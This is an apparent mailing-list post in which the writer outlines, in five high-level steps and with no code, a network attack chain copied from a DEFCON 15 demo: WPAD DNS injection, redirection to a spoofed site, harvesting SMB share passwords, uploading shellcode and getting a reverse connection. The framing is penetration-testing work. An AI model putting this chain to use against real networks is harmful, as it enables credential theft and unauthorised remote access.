Defcon 15 Speech - Trying to *borrow* the demo

[angelisonline at gmail.com (Mr Gabriel)]

Hey guys, I've been watching the speech that HDM, and Valsmith gave  
at defcon, and I want to try and emulate the demo they did at the  
end. I know HDM, and Val are probably reading this email anyway, so a  
quick message to them - I'm not trying to steal your demo... okay,  
well I am, it was just such a powerful demo, you guys made it seem so  
easy to own an entire network.


Okay, what I got so far, is this.

Preparation:
Running, working socks service
Running, working apache service
Running, working squid service, with transparent proxying



Step One:- Inject DNS name WPAD

Step Two:- Redirect them to your own spoofed site, regardless of what  
website they try go to.
Aim is, to get them to create an SMB connection back to you.

Step Three:- Get them to provide you with their password for  
connecting to shares

Step Four:- Using that same password, connect back to them, and  
upload your shellcode

Step Five:- When the shell code runs, it should connect back to you,  
giving you remote access to the entire system.



Feel free to correct my mistakes, and stuff like that - add extra  
techie details, laugh at my stupidness, whatever! So long as we end  
up with a working writeup, that maybe we could all take to work, and  
land a few more clients :)